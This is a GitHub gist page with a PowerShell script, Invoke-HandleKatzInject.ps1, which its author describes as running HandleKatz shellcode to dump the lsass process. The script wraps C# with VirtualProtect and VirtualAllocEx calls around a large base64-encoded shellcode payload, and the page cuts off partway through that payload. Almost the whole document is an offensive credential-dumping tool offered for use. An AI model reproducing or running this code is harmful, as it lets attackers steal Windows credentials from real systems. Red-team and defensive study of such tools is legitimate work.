Skip to content

Instantly share code, notes, and snippets.

@S3cur3Th1sSh1t

S3cur3Th1sSh1t/Invoke-HandleKatzInject.ps1 Secret

Last active October 1, 2022 16:58
Show Gist options
  • Star 14 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save S3cur3Th1sSh1t/9f328fc411ff103c0800294c523503e2 to your computer and use it in GitHub Desktop.
Save S3cur3Th1sSh1t/9f328fc411ff103c0800294c523503e2 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Invoke-HandleKatzInject.ps1
function Invoke-HandleKatzInject
{
<#
.DESCRIPTION
Execute Handlekatz Shellcode to dump lsass.
Main Credits to https://github.com/codewhitesec/HandleKatz
Author: @ShitSecure
#>
Param
(
[bool]
$recon = $false,
[string]
$DumpPath = "",
[string]
$handlePid = "0"
)
$HandleKatzInject = @"
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace HandleKatzInject
{
public class Program
{
[DllImport("kernel32.dll")]
static extern bool VirtualProtect(IntPtr hProcess, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Ansi)]
public delegate uint HandleDelegate(bool reconOnly, IntPtr path, uint pID, StringBuilder output);
public static void Inject(bool recon, string path, uint pID)
{
// HandleKatz.bin base64 encoded - https://github.com/codewhitesec/HandleKatz
string base64Katz = "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